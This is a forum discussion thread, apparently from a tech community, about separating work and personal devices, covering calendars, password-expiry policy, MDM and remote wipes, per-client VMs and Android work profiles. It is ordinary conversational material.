I got a new job recently after being at my old place almost 15-years. I've decided I'm doing things differently this time. All my work stuff is on my work equipment, all my personal on my personal, and never the two shall meet. I don't have e-mail or slack on my phone. I don't have personal e-mail on my work computer.
It's remarkable to me how much this has improved my life. It took some getting used to, but when I'm working I focus better on work, and when I'm not I unplug. It seems obvious yet somehow leaving work behind at the end of the day escaped me before.
Also as someone who used to run an IT department, it's shocking the degree that some people fail to realize their work equipment is well works. Personal e-mail on your work laptop, I get it. Your entire collection of photography celebrating the human form in your folder of the company shared drive, why would anyone think that's a good idea?
Calendar is what kills this approach for me. I am not two different people with two different calendars, I am one person with one calendar. Scheduling & making all my appointments is really troublesome with two separate calendars.
They usually have extreme security guidelines for employees. All external laptop ports disabled, so no way to plug in periphery nor connecting a tv for a presentation.
No internet access at on laptops or only with a sim card which only allows connections to the VPN bastion host etc. Direct Internet on premise is a no-go as well, obviously. So no checking stack overflow if you've got any issues
They still leave infrastructure with default passwords exposed to the internet and implement questionable password policies for their customers... But they do everything they can in order to sabotage their employees!
That's a good description. The invest a lot in highly secure technology and processes, and then ignore them out of convenience.
I work at a department that's all about data quality and integrity, and we have super bureaucratic processes to regulate access to data, but you don't want to know how much data lives in Excel files; an issue I'm constantly trying to address.
> with a few minutes of delay between Google and Office365 calendars
How in the world do you do that? Subscribe to Calendar isn't even possible with Office 365, right? You have to use From URL, to which you give the .ics URL, which Google Calendar normally pulls a couple times a day. Is there a different mechanism you use?
We should discourage this stupidity of expiring passwords wherever we can.
Maybe make it a point to put your passwords on a sticky note stuck on the monitor prominently on display if $work requires you to change passwords that frequently?
Nobody actually cares about the security of expiring passwords, it's just a line item on a checklist of official processes. And the people auditing it don't visit in person
“Verifiers SHOULD NOT require memorized secrets to be changed arbitrarily (e.g., periodically). However, verifiers SHALL force a change if there is evidence of compromise of the authenticator.”
Users tend to choose weaker memorized secrets when they know that they will have to change them in the near future. When those changes do occur, they often select a secret that is similar to their old memorized secret by applying a set of common transformations such as increasing a number in the password. This practice provides a false sense of security if any of the previous secrets has been compromised since attackers can apply these same common transformations. But if there is evidence that the memorized secret has been compromised, such as by a breach of the verifier’s hashed password database or observed fraudulent activity, subscribers should be required to change their memorized secrets. However, this event-based change should occur rarely, so that they are less motivated to choose a weak secret with the knowledge that it will only be used for a limited period of time.
Both NIST and NCSC now actively discourage password expiration. And it took them only what, 30 years, to catch up with real-world best practices?
That said, there is a place for 30-day rotation. That's when the so-called "password" is actually a shared secret for extremely high-value systems. Payment gateways, for example.
> That said, there is a place for 30-day rotation. That's when the so-called "password" is actually a shared secret for extremely high-value systems. Payment gateways, for example.
Should we even attempt to let the user define such shared secrets? If 30-day rotation is good, surely 30 second rotation is better? Perhaps we can replace such "passwords" with some kind of one time PIN (OTP) or some generated pass phrase only valid for n minutes?
Well, in this shared-secret case we're talking about "symmetric signing keys" (really: MAC keys). Those types of keys are not defined by the users, they are issued by the party you're connecting to and delivered over a known, reasonably secure out-of-band mechanism.
I am all for having transient secrets, but without an extremely well integrated and robust vault they would be unmanageable. Plus asymmetric handshakes are computationally really expensive, so you don't do them all the time.[ß] The 30-day rotation period for these types of secrets is merely a reasonable compromise between "assume all shared secrets will be compromised" and the human factor.
ß: a friend set up a dedicated payment gateway device for a UK challenger bank. For just one card issuer. That thing can supposedly run at 10Gb line rate, so doing asymmetric crypto frequently would murder performance and latency.
I've been confronted with exactly this a short while ago, and even produced Microsoft's official stance on this (against). But in the end, their argument really boiled down to "but my checklist says so".
Microsoft's [0] first entry of "Common approaches and their negative impacts". With a reference to the FTC website. [1]
This is so infuriating. NIST has been advising against it for years by now and even Microsoft switched the official stance last year or so, but it still keeps being done out of inertia. It's also still in the AWS best practices (I unsuccessfully tried to argue against introducing it for our accounts).
Though, to be honest, at this point I believe that humanity should just abandon passwords for all but the most unimportant of things (e.g. your account on some hobbyist forum), at this point they just have too many downsides and most people seem to be unable to handle them properly.
> Anything outside work hours doesn't need to be on a calendar.
I'm happy that works for you, but for me or anyone else who can be absent minded sometimes, that does. not. work. I need a calendar to remember promises I've made to people about when and where I'll be. Tuesday I'm meeting a friend to catch up in person, Thursday I've got a birthday dinner to go to, there's a show on Friday that I have tickets to. Stack multiple events in a single night if you have a busy social life. That's not a ton of information to remember but human memory is imperfect, and that sort of information is in one ear and out the other for me.
Prior to pocket computers, I'd have a paper datebook to carry around (and lose), but thanks to modern technology, it's stored in the cloud and accessible for me at https://calendar.google.com.
> Anything outside work hours doesn't need to be on a calendar.
Can't edit original, but what I meant there is that it doesn't need to be on a calendar that work has access to (if the event is outside working hours).
For things on weekends I put those on my personal calendar. But that's clear-cut separation since no work event will ever be there.
The conflict is only for personal events during work hours. For those I put the blank placeholder in work calendar to block out the time.
But you need to check both calendars when making the appointment. I can see how that's cumbersome, and in fact is one thing I deal with as well.
It would be nice if I could sync my work calendar with my personal calendar, but with all details redacted except for begin, end, and perhaps location.
Depending on your software, you can! I know Google Calendar allows you to restrict shared calendars to just time ranges, it'll show up as "not available".
Settings > Calendar Settings > Access Permissions > Make Available to Public > on the dropdown, pick "See only free/busy". Now you can share the link with your work calendar and it'll show up as indistinct blocks of time.
You can do it both ways, and you'll be able to check your availability for both work-related things and personal things in their own calendar, but contextualized.
Even my work calendar doesn't share the details of what I'm doing in a busy slot. Not particularly something anyone needs to know. If someone really needs to meet and my calendar looks blocked they can ping me to see if there's anything I can drop or move. It's not really up to them to make the decision (unless I work for them and it's urgent).
Be default, my work calendar is strictly work and my personal calendar is strictly personal. I only duplicate personal events to my work calendar if they overlap with my work hours. Everything outside of work hours goes in my personal calendar only.
Aside from the odd appointment at the dentist or doctor's office, I don't have very many appointments that need to show up in both calendars. Work hours are work, everything else is personal and none of my workplace's business.
For those rare cases, it really isn't a problem to look at my work calendar on the work PC and my personal calendar on my phone and do a quick comparison.
In general, if I have a personal appointment, I'm not going to forget about it. Just the act of having added it to my calendar is enough to remember it, without having to look at the calendar. I only ever mix personal events into my work calendar if I there is an overlap with my working hours, everything else is none of my workplace's business, I'll polite decline any meeting that conflicts.
Besides, last-minute meetings are a sign of bad meeting culture.
This is one place where you can, maybe, shed a tear for management. Imagine your CEO keeping a separate calendar. Don’t you want them inviting investors over for dinner?
With google calendar, you can add your private calendar (via a sharable url) and set it up such that it marks your private events as busy. Very useful.
The only time this bit me so far is that once I had a weekly recurring for…two years. And one day, for some reason, my phone started RSVPing to it again. Except it was every instance of it that had passed…blew up my bosses inbox and made my phone useless for about an hour. It was the weirdest thing. Funny though.
I believe that was an iOS bug, I remember hearing about that in a few instances where the built-in calendar client was connected to Office 365. In all cases it was solved by updating iOS to some bug-fixing point release.
I do this while freelancing/contracting as well. I have a macbook for client work only.
While I don't have a one for each potential client, I do use a different user for each client, and all data should remain in user space -- which is easy enough to accomplish since I need to maintain matching versions of databases anyway, there is no need to share a single data store.
I've done this before with one VM per client. Makes archiving etc. simple also, and means that per-client setup stuff never tramples on each other.
Gives an answer for how you firewall sensitive data also, e.g. every document you gave me never existed anywhere except in this (potentially encrypted) VM. Easy to delete cleanly.
That sounds like a clean way to organize multiple clients.
For some types of development, I find working on a remote server using SSH/Mosh/tmux works really well for me. I am retired now but I used to ask clients to rent a reasonably powerful VPS that we both had access to and just worked on that. I think this gave customers good control over their property (i.e., the work I did on their behalf).
It's a great system. The only real pain I've run into with it, on macOS anyway, is that you can't isolate iCloud accounts and still receive texts on your Mac. So unless you have a separate phone for each client, that's not so great. Also, the lack of profiles on iDevices means any client-specific apps (2fa stuff, for instance, or if you like to have Slack on your iDevice, or dev/testing apps, or whatever) ends up in a shared space on there.
Right, the trouble's getting text messages and such through to your laptop (text message 2fa is so nice with a synced phone—auto fill!), if you have multiple clients. One work phone + personal phone (or tablets, or whatever) is fine. It's when you have three clients, and maybe they rotate out sometimes, that it gets to be a little annoying.
... unless you can add multiple iCloud accounts to one phone. I guess I've never tried, because I just assumed you couldn't. Though you'd still have the problem of things like dev builds and all that existing in the same space, and email accounts (on the phone) syncing to the same application without much separation, and all that.
I once worked with a guy in the early 2000s that did 1 laptop per major client project (this was local workflow type app stuff, so windows desktop clients with maybe some kind of data backend) when he was complete he literally took the laptop and put a label on it and put it on a shelf. He'd been burned once to many times on backwards compatibility and library quirks with windows.
Would almost be better with in addition a vm per customer or at least some kind of encrypted partition per user/customer. Not sure how easy it is under Linux.
Another advantage of doing this on separate VMs on Qubes is it makes it easy to comply with end-of-contract requirements to destroy all data. Just delete the VMs, and if needed, old backups.
I tried to use this approach before, but if I remember correctly Homebrew didn’t like it. I like to manage my software with Homebrew, but multi user simply wasn’t working
You can install Homebrew in a non-default directory like somewhere under your home directory. It requires every package to be rebuilt during install, but it's possible. This means you should even be able to get away without even escalating your privileges to root.
How do you handle brew? It makes all the /usr/local/bin stuff belong to the regular user which installed it. Other users had trouble working with brew-installed stuff, last time I tried a few years ago.
You can install brew in your home directory using the Untar Anywhere approach. I’m particular sceptical of how brew handles permissions, so I always install it to ~/homebrew. One thing to note, if you use this approach Homebrew will not use its precompiled binaries and build everything from source.
I do the same on Linux, I install software that I always use (DBeaver, Intellij, Spotify, 1Password, browsers, postman, docker stuff, etc) with my 'personal' user and when I switch clients I just create a new user and copy over my licenses.
Then I use firefox for everything client related (their outlook, jira, etc) and just login to my gmail on chrome or brave or something.
KDE has the concept of activities (think like, virtual desktop on steroids, with custom widgets and look) which I used for some time to split between clients' work.
It was a fun gimmicky but I can't say I missed it once I had to start using a Mac.
I did this exact same thing at my last job, and I agree that it's remarkable how much it made both work and non work life better. Drawing hard lines can oftentimes make compliance much easier. Just the fact that I had decided to not have/do ANY personal stuff on my work computer made it very easy to focus and be extremely productive. I'm in the middle of my career, and it was by far my most productive time as a software engineer.
That being said, I didn't work myself to the bone. Instead of taking breaks with reddit, checking personal email, or spending time on social networks, I allowed myself long lunches, long walks, naps in the park or at the beach, and other forms of relaxation during the working day. This easy pace allowed me to perform some of the highest quality and most creative work of my career.
I’ve known so many people that wanted to get into crypto over the last decade and didn't even own a laptop of their own and were practically married to their employer as if that was normal (in their corporate world that was normal)
They had no way of managing private keys, privately or properly at all
They did it anyway, in one instance one person turned in their computer for routine IT maintenance and it was wiped! lol! Its pretty obvious that a person like this only had a passing interest in crypto and never made any backup
Things are so much easier now with hardware wallets that connect to iphone apps
But its shocking how people often have no separation
But I use my own computers for most things. If I had to use a work-issued computer for work things, I'd be more careful about commingling. (I do have a work laptop, but I don't use it for very much.) I also generally keep personal and work email separate--to the degree one can really deliniate personal and work.
For me, using Facebook cookies in the same browser as work stuff blows my mind. I specifically write in the onboarding of my employees “Create a separate Chrome or FF profile to use your Facebook and other personal browsing”, and only half respect this rule, interns being specifically bad (experience workers do want work/home isolation). They receive quite a scolding when I catch them, but the damage is done: All websites have immediately registered who they are associated with, who their colleagues are, etc.
Stringent security rules and obnoxious firewalls exist because people don’t respect cool rules.
I had a similar experience after switching companies (to remote) last year. Work computer has no personal accounts/services. iPhone (and personal Mac) has no work accounts/services. No Slack, calendars, etc. I made it clear up-front that I am not available before 8AM and after 5PM M-F, but very available during work hours. Best decision I ever made!
I try to do it. One thing that helps is my Logitech MX keys, it switches to my Phone with the push of a button, so I don't feel the need so much to install Signal and Telegram on my work laptop. (I still do of course, it's just too easy... but I try because I understand the problem.) What is nice about my employer is that they ask you to fully wipe your drives (throw away the encryption key) before handing/sending in stuff. It's as much protection for them as it is for me.
What you realize when you do that is how people actually adapt. I dont mind both, I have phases when Ill be fully plugged and answer work email at 1am, which starts to create a super fun action-oriented life where it's a denser and denser tunnel of things to do, fix, answer.
But then when you stop (I got a Huawei phone which cant install most of the corporate things for national security reasons), then wow. When I leave I leave, I do dilletante stuff, eat out with my wife and nobody cares. They just call someome else. I get probably less cookie points at annual reviews but a few rushes at the end of the year can usually compensate.
That wasn't OP's point. They meant that they don't have work e-mail or work slack on their private phone, to provide separation between work and private time.
When I have worked for similar companies, I simply didn't install any of their software on my phone. If they wanted the ability to wipe it, they would have to give me a phone for it. Sure enough, it never turned out to be that important to anyone.
Yeah, I wouldn't trust company MDM on a personal device at all. Best case is that someone with an itchy trigger finger wipes your phone. Worst case you've got someone deciding to poke around your personal device for shits and giggles.
Ironically, a week before I left one of these companies, they remotely wiped my work laptop. Someone got the memo wrong, and I spent the better part of my remaining time with them trying to get access to all the various systems so I could complete one bug ticket. I hate to imagine what would have happened if I had given them access to my personal phone.
Is it an Android? How does that work? Is it a special permission or something?
I've allowed Slack on my personal phone. It has no permissions according to the Android OS (beyond permission to use the network, which, of course, can't be denied least Google lose ad revenue). I don't think it can wipe my phone. I hope it can't wipe my phone?
MDM is kind of a super admin feature on Android and iOS which allows for all kinds of things normal apps can never access. It's used by companies to manage company owned devices so they can do things like reset the password and remove the apple id lock when an employee leaves.
It's not that slack can wipe your phone, but that (it sounds like) slack can detect the presence of the company MDM setup which can wipe your phone and lock you out of the app if it is not detected.
Really like this approach but 7KG cabin baggage limits on lots of international flights are what makes it really hard for me. I sometimes struggle to get single laptop + iPad + charger + power bank within the limit, let alone two sets.
I always carry two laptops (personal + work) on all trips, domestic or international. Other than added inconvenience of having to take out and put back stuff during security checks, it has always worked out. Even when I end up exceeding the 7 kg limit, I've never been stopped.
I think this is reasonable advice, in some settings. But for many of us, I think it’s just not practical anymore.
The lines have become too blurred. I work from home, I have one office and one desk. The computer on the desk was purchased by my company but other stuff wasn’t like my mouse or my iPad. I have work Slack on my phone, which is my personal phone. I know I should be, but I’m just not that careful anymore about what I do where.
Granted, I work for a startup. It’s a MBP they had shipped directly from Apple to me. I set it up and configured it myself.
The GitHub Balanced Employee IP Agreement acknowledges that this distinction is arbitrary and unhelpful:
> In California the main difference made by BEIPA is that IP developed with company equipment or relating to the company's business, but in an employee's free time and which the employee is not involved in as an employee, is not owned by the company (but the company does get a non-exclusive and unlimited license if the IP relates to the company's business). This recognizes that from the employee perspective, segregating one's life activities based on ownership of devices at hand or relatedness to an employer's potentially vast range of business that an individual employee is not involved with as an employee imposes significant cognitive overhead and often doesn't happen in practice, whatever agreements state.
If your employer wants you to have Slack on a phone, they should buy you a phone. That’s been my situation across multiple employers for 5+ years.
I plug the same monitor and mouse into a work computer and a personal computer. This isn’t hard - you can use a single dongle with all of your inputs so you only need to swap one plug. Or you could use some kind of KVM switch.
I understand that startups may not want the expense of buying hardware for their employees, and you might not want to buy your own laptop, but if you end up building something valuable in your personal time, it’s in your interest to keep these things separate. For example, you might work on a side-project which is somehow related to your employer’s business, and eventually decide to quit and start your own company. You’ll be in a more secure legal position if you used your own device for that. You might judge that you aren’t likely do do that, but you should think through the trade-off.
The GitHub agreement sounds like an improvement, but most companies don’t use it. I’m not sure how well it protects your interests. If you’re working at odd hours because you’re receiving notifications on a personal device, while you’re also working on your side-project on a work device, would lawyers agree on what is personal and what is work?
> If your employer wants you to have Slack on a phone, they should buy you a phone. That’s been my situation across multiple employers for 5+ years.
I wholeheartedly agree with computers/systems, and keeping things separate there.. but two phones? Who wants to carry around two phones just for staying on top of slack during _off hours_?
If the company isn't ok with me using slack on my personal phone, then I'll only use slack on the supplied computer during business hours (eg. they get no mobile slack out of me at all). Either that or I find a different job. Life is too short to deal with so many devices and the hassle of it all.
I love my job and I love my life and I deliberately blend them together. This makes me substantially more productive as an employee, and incalculably happier as a human being.
If I want to see a friend in the middle of the day, I do it. If I want to take a 3 hour lunch, I do it. When someone 8 time zones away answers a question I asked earlier at my 1AM, and I’m awake and see it, I’m excited to learn the new whatever thing, and may take an hour (or three!) to chat with them about it.
Everything I do in life I have opted into and enjoy. I gain nothing by firewalling some parts of it from other parts.
I have tried every modality of managing work and personal life and this one is by far —- by far —- the best one for me. The notion that there is a work laptop and a personal laptop and naer the twain shall meet is a complete anachronism. It’s fine if that separation helps other people but it actively hurts me.
> The notion that there is a work laptop and a personal laptop and naer the twain shall meet is a complete anachronism. It’s fine if that separation helps other people but it actively hurts me.
Wow.. All I can suggest is think through the consequences. Unless you work for yourself or a very tiny startup, your employer is monitoring everything you do and store on the work computer.
You may also get cut off at any moment with zero notice if there are layoffs. If you had any personal content there, you've lost it.
Also, depending on where you live, but it can also mean now the company has a strong ownership claim to anything and everything you do in side projects since it is being done on company equipment.
I work for a large company, I have a desktop machine, I fail to see how the company would have access to it (assuming they aren’t using any zero day exploits etc to attack it). They don’t have my private ssh key so can’t ssh in, it sits on my desk at home so they have no physical access. It came straight from the factory and I installed vanilla Ubuntu on it.
> on a personal MacBook and no one is monitoring everything I do
Well you said personal MacBook, this topic is about work laptop or phone.
These days (sadly) for any non-small company, all work computers and phones have remote control spyware. If you think that's not the case in your large company, you're probably wrong.
At a recent medium size engineering company, I was constantly surprised how even extremely technical engineers in the company didn't realize all the company spyware that is running on their laptop.
The standard Linux laptops people are given are fully company-managed. But many people, including myself, reload them with a distribution we manage ourselves.
I do have MDM on my personal iPhone but that seemed like a reasonable tradeoff in order to easily access work email and files on my phone.
For some odd reason, I instantly thought of Foucault's idea of biopower[1][2] after reading your comment as a possible counterpoint, despite not being well-versed in the subject.
Having a work phone that you cannot be reached on outside of standard work hours kind of defeats the purpose right? At least that is the sole reason I can think of that I would need a work phone in the first place.
The purpose of a work phone is to carry it during the specifically agreed upon period that you are actively on-call.
And you should be compensated specifically for that on call time. A standard is 1/3 of your on call time out of business hours is credited as PTO hours for 30 minute response.
Or 2/3 of your on call time out of business hours is credited as PTO hours for 5 minute response.
Why else would an employer want you to use slack on a phone? "On-Call" devops rotation or something like that?
Same rules apply even in that case. If you can't txt/page/slack me on my personal phone, then you don't get me "on-call". I'm _not_ going to carry two phones for anyone ever again (been there, done that, hated it).
> I wholeheartedly agree with computers/systems, and keeping things separate there.. but two phones? Who wants to carry around two phones just for staying on top of slack during _off hours_?
I have no issues carrying the work phone with me during the _working hours_. But off hours I just leave it next to the car keys, so I don't forget to take it with me the next morning. Just because I have a work phone that I didn't ask for doesn't mean I have to carry it with myself or even check off hours. It is useful only to have a toy to play with during the boring face-to-face meetings.
There's a virtualized Android concepts out there, but I really want it to go further. I already have dual sim in my phone, but Android has essentially no support for multiple independent copies of individual apps.
Of course, workplaces tend to insist on remote data wipe functionality and that's a big nope from the get go.
The sad thing is, Google could fix this and use their authoritative position to declare it safe: support multiple encryption keys in the secure enclave on a device, encrypt apps associated with different profiles with different keys, and allow registering "work" keys as remote wipeable. Throw in some sort of copy+paste restriction option to satisfy the pedant IT managers who think cameras aren't cheap and common.
Haven't you just described Android's existing work profile feature? It works exactly like that as far as I'm aware.
Work profile requires explicit support from your IT department, but Android also supports multiple user accounts on one device (each gets their own lock screen, home screen, app switcher, notification shade, settings, installed apps, etc), so you could segregate things that way too if you can't get your IT department to support work profile.
I feel like multiple user accounts is an underappreciated feature of Android. I just got an iPad and it's a real drag that you can only have one Apple ID logged in on it, one set of apps, one home screen, etc. Tablets are made to be shared.
>Q: Why not use Island by OasisFeng, the creator of Greenify?
>A: Simply because it is not an FOSS app and it bundles with non-free SDKs. Note that this doesn’t necessarily mean that Island has anti-features like tracking (and I don’t think it has either), it’s just that I wrote Shelter as an FOSS replacement of it. There is no other reason why one would prefer Shelter over Island except for this one.
If carrying two phones is not feasible, why would carrying two laptops be? I've done work and person projects traveling through different countries at hotels and coffee shops pre-pandemic, and there is no way I would carry two phones OR two laptops.
Personally I like blurring the lines between work and private life. Do some personal stuff during work hours (no more messing around getting time off to go to the dentist or the bank - I just book a meeting in my calender and go). Answer a quick question while I'm on the subway. Spend an hour at night helping out a colleague in the US with an urgent problem when I have nothing better to do anyway. I'll just sleep in in the morning when things are quiet. I love this.
What matters also is that I really like my work. And it isn't forced on me or even expected in the slightest. It's nice when I can pop in when I'm off and help out. If not it's fine too. Flexibility.
For me this works. I understand it doesn't work for many others like yourself. But that doesn't mean it should be made impossible for me (like some countries do, e.g. in France forcing work email to stop after hours).
I'm happy to see this is not just me with this perspective. Especially with WFH, I routinely work out, do groceries, go for a walk, or just read during work time (I'm self employed but the pattern has not changed at all since I left my salaried job). I make up for it by working at other times that work for me, and if e.g. I'm reading a book, I'll keep Slack on the phone so I can be available for a discussion. Most of my team at my last job was similar, usually with some set of disconnected times, e.g. for family stuff. Some would sleep in and work late, some would have supper early and put kids to bed, then work some more... I like this approach so much better than being stuck somewhere for 8 hours forced to try to be productive.
I think this mixes up two things: (1) segmentor-integrator dichotomy and (2) flexible working patterns.
For example, I am an extreme segmentor (two laptops and two phones, both of which are either off or put away in silent mode when I'm not working; zero work-related stuff on any personal devices).
At the same, my working patterns are very flexible. I just look at my diary first thing in the morning to figure which meetings I need to attend, and plan the rest of the day however I see fit. Going to the gym, for a run, sitting outside to read, running errands or getting a massage in the middle of the day are all completely normal.
I encourage my reports to take a similarly flexible approach to working, regardless of where they are on the segmentor-integrator spectrum (most of them are integrators).
Same. I don't overwork. Except maybe when I travel but I like travel. If I'm "off the clock" whether vacation or after 5, I'm not going to (nor be expected to) suddenly spend the rest of the night dealing with something. But maybe I can write an email or two or take a quick look at a doc which helps someone. And, as you say, I don't feel guilty going to the store or the dentist during the day.
I like working like this too - I want to be able to work when inspiration strikes, or when my customers need me, and not be forced to busywork when it's not necessary. Of course, it helps that my work is really my hobby and, to some degree, what I do for fun.
I also want to be fairly compensated, though, and if I'm lying awake at 4am solving the hard problems because I'm so engrossed in my project that I'm dreaming about it, the only really fair compensation is a percentage of the profits. So for me, since nowhere I've worked is willing to contemplate a profit-share arrangement, this kind of work only really works if I own the company.
For some of us, we kind of make up off hours as we go. If it’s 2pm and I’m bored and I have no meetings, I might just take 3 hours off and go to the park or gym, and if a coworker has a question during that time, I don’t mind answering it.
I prefer to do things whenever I want to do them and not bother with “on” and “off” hours.
Exactly. It is nice for "flex-work"--go walk the dog or run some errands or something, but still be "semi-available" for questions, but not "at the computer".
What's the point of having phones thinner than razor blades, if not to facilitate carrying two of them? I think I could stack 5 or more phones and they'd still easily fit in my pocket.
I think most of us are in the situation that our employers don’t explicitly want us to have Slack/Teams on our phones. They want us to be available.
Slack/Teams on my (personal) phone means I can run an errand in the middle of the day and still be available. I’m happy to use my personal device for it. The alternative is having much less flexibility.
If my employer expected me to be available outside office hours or when not at my computer it would be a completely different story. Like if I was on call. Then I’d demand they pay for my smartphone too.
As someone who worked before there were smartphones--indeed, before there were mainstream cellphones and laptops--I'm acutely aware of just how "chained to your desk" you used to be in that, if you weren't there, you couldn't be reached. Of course, you were sometimes in meetings. But, for the most part, you really needed to be sitting at your desk most of the day if only because someone might call you with a question. (Yes, a sales rep calling me on the phone as a product manager was the norm.)
Shouldn't the thing _actually be_ "if they want you to have Slack on your phone, they should pay you for availability during off hours"? The phone buying is a basically one-time cost from their perspective.
ive got a wireless mouse and keyboard that support multiple devices, so i dont even need to swap the plug. to use my personal computer i just switch the monitor input and the mode on the mouse/keyboard.
> HARD disagree. Use a separate personal machine and a KVM switch or hub/dock.
This! Especially with Thunderbolt being widely available n high end machines, switching between computers is easier than it ever was. I have a work Windows machine and a personal Macbook. Switching from work to personal system is a matter of unplugging and changing a single cable.
FWIW, with JAMF, your employer can ship it straight from Apple to your door, and still get their MDM all over it the second it connects to the internet the 1st time.
I understand this sort of thing pisses people off but Windows Autopilot and automatic enrolment into Intune has been an incredible help this last year.
Where I work we managed to ship thousands of laptops to students homes from the manufacturers during lockdown and but still ensured that they had the correct E-Safety software and configurations on them when they turned them on for the first time.
> FWIW, with JAMF, your employer can ship it straight from Apple to your door, and still get their MDM all over it the second it connects to the internet the 1st time.
You buy the hardware through an Apple business portal and Apple will register the machine to your MDM server. The first thing the laptop does when being set up is to check if it should download MDM configuration.
We do this for all Macs and iPhones for our employees, we buy them directly through our Apple business portal and it all automatically registers to our JAMF account.
Any technical resource/paper with the details on this?
This seems ripe for exploiting for nefarious purposes. With Apple having built it, all it takes is one court order targeting a serial# and it auto-installs full remote control spyware on that mac?
Do you charge your company for desk space at your house?
It's not being talked about much, but since companies are okay paying landlords billions, they seem to be shy to pay their employees for use of their homes as offices.
> Do you charge your company for desk space at your house?
Do you charge your company for your commute to the office?
I can see where you are coming from, but charging the company for office space in your home is a bit over the top IMO - paying for the setup should be sufficient. Additionally, working from home comes with time and money savings for you (unless your answered "yes" to the question above), so it's not like they're using your space with only disadvantages to you. Lastly, renting out the space in your office might come with further drawbacks, as the company could demand more control of the space it is paying for.
> Do you charge your company for your commute to the office?
Travel expenses for your commute are pretty standard. My employer offers either a per-kilometer amount (if you travel by car) or a train subscription, if you travel by public transport.
During the pandemic I had colleagues sitting in their garage for one full year. These was spot no other place to be. Other younger colleagues has studios where they said when they sit up straight in their bed they are at the ' office'. So to me this is a discussion we should have.
In Australia and Germany there are tax deductions for utilities as far as I know.
> Do you charge your company for your commute to the office?
Companies tend to pay people for their commute here in Belgium. This can take the form of paying your train pass, a reimbursement per kilometre travelled or even a company car + fuel card.
That doesn't cover the hours spent travelling, of course.
When I had a sizable house in an affordable area using a home office felt like a blessing. After moving closer to the office and renting in an expensive area this past year has been... difficult. I'm essentially paying 800/month in rent for the space my wife and I have been working out of.
I can weather this as a temporary pandemic measure but for some of my early-career colleagues it's a very serious burden.
I agree. But I think we need to look at these things even further.
It's sensible to separate the two in principle, but the arguments forwarded by the author seem to ignore the actual substance of the issue here: that people ar not machines that can genuinely do "work" and "play" separately and that employers should not have that sort of power in the first place.
The world we should strive to build is not one where security issues are entirely removed from the equation or where employees become perfectly aligned with their employer's business needs, but one where most individuals of the society lead healthy, fulfilling, meaningful lives.
As such, it's not the employees that should remove their humanity from teh workplace, it's the workplace - the employer - that should be take (many) steps back and allow people to be people.
I understand that visual arts or being a writer are considered a different businesses than IT, that's a pretty common sense, but I guess if you're doing a website on a company property where their business is embedded systems this could be qualified as the same business (IT)?
I recently switched jobs. When I put in notice at my previous employer there was some sort of miscommunication with IT about my last day and I was shut out 2 days early, before I had a chance to wipe everything or even log out of my personal stuff (in their own chrome instance). They were not willing to undo it, but assured me everything would be instantly wiped once they received it. Couple days later I decide to check my google accounts for some other purpose and see an active session in the city where I mailed back my machine to. Same with a few other accounts. Was not thrilled with that.
I use an encrypted linux VM with a VPN on my company Mac for anything personal like listening to music or checking email. At least if they were to suddenly lock me out of my Mac, the personal data would be encrypted. If they had a problem with me doing this, I just delete a single disk image file and everything is gone.
I wish there was a way to do that natively with Firefox, whereby a whole profile is encrypted and password protected. Most personal things I do on work PC are through the browser, so if the profile were protected, it would be problem-solved.
I'm using VMware and it allows for encrypting the disk image and locking the settings behind a password. Within the VM, I'm using disk encryption so that the filesystem is secure. And then I run my own WireGuard VPN and I've setup network manager to auto connect so my traffic traverses the VPN.
I'm sure there are better ways to setup the VPN but it works for what I wanted it for.
Oh wow. So they aren’t encrypting the devices or they have a master key? We use Apple laptops at my work and when somehow I messed up changing my login credentials, the only recourse was to wipe the device because it couldn’t be decrypted.
Jamf, for instance, lets me configure a policy like “use FileVault to encrypt all laptops, and also escrow an encryption key”. I can decrypt any encrypted work laptops if needed.
This is such critical advice, particularly if you work for a company that does remote hardware management.
You could be fired tomorrow, and your access to your hardware revoked instantly. Apple devices, in particular, allow IT to remote lock your laptop. Whatever you had stored on the drive is lost to you, available to your employer, and you can't do anything about it.
Saying "instantly" is under selling it. It literally happens before you are fired. IT will have disabled you ability to access files before you have been informed it is happening.
If you got the laptop in a sealed Apple box (purchased by employer), and set up macOS yourself, created your own admin user and everything, does this remote access still apply?
I manage hundreds of Macs. Just wanted to add that these management profiles don't say much about what you can and can't do and what your company can do. You have to go through each of them to see what they do (the management one is just the master one, there will be tons more which specify exactly what is restricted and/or enforced). Apple is very good at privacy protection, asking the user for permission even on managed machines, which can be bypassed with certain profiles but it's pretty tough to do. I personally take this as a sign to think long and hard about whether I really should.
Co-usage is just a thing these days. A little trust in your employees is also important. Usually these profiles just mandate some basics like password complexity, disk encryption and they set standard settings like WiFi and printers so you don't have to bother figuring all that stuff out. And it will install applications you need and security stuff.
And don't forget, a password complexity profile on a Mac will apply to all accounts created on it. Even ones created by the user. Many things work like this, on a machine level. It's more about establishing a security baseline than tying the users' hands.
It means your employer has a very low level of security and you should be genuinely concerned about any personal or financial information you gave them during your hiring.
That is like arguing "not all cars need seatbelts." You might disagree on how many airbags or crash avoidance widgets a car needs, but the vast majority of the industry agrees that seatbelts are a requirement.
Every single FAAMG company runs managed endpoints. I'm not sure why you are arguing that companies having no control over their hardware is somehow a security feature?
Yes, it does. The employer has registered in front of Apple the serial number and Apple considers the device theirs. MDM on an employer's laptop allows them full control. If the device is owned by the user, then the MDM is more limited.
It's actually the vendor that registers Macs. Only iOS devices can be registered to Apple DEP manually. Macs can't, only the vendor can do so, whether it's Apple or whoever else.
It would still need on-device authorisation to opt into MDM though. I can't just give Apple your serial number and tell them to start pushing updates to your device, can I?
At the time of purchase, the vendor knows which machines the employer buys and assigns them the relevant privileges. When the machine is initially opened, it connects to Apple and is provided with the address of its mothership server. The MDM server then instructs the machine what to download and how to configure it. The user has just to unbox the machine and nothing else. This is convenient because it allows for downloading multiple apps, installation and configuration of certificates, setting password policies and many other actions that users are really prone to mess up, and that are wasting lots of sysadmin time if done manually one by one.
If the user owns the machine, then there must be authorization and the MDM has much more limited, privacy-preserving scope.
That's really surprising. I suppose it makes sense if it happens at the time of setting up the machine, and an explicit notice is given to the end user. That should circumvent any privacy and security issues.
I think they are asking if you could social engineer access to someone's laptop by knowing their serial and calling enterprise support. Seems to me like you could.
This entirely depends on what you do from that point forward. Are you using a VPN provided by your employer? Are you installing any screen sharing or collaboration apps for work? You'll need to understand what each of these are capable of in order to fully understand your exposure.
Yes, agreed. Apple does a good job letting you know what your company has access to, and if you use iCloud / Personal GMail, your stuff stays with you after you leave.
Chromebooks provide separate logins for personal and Workspace/GSuite accounts.
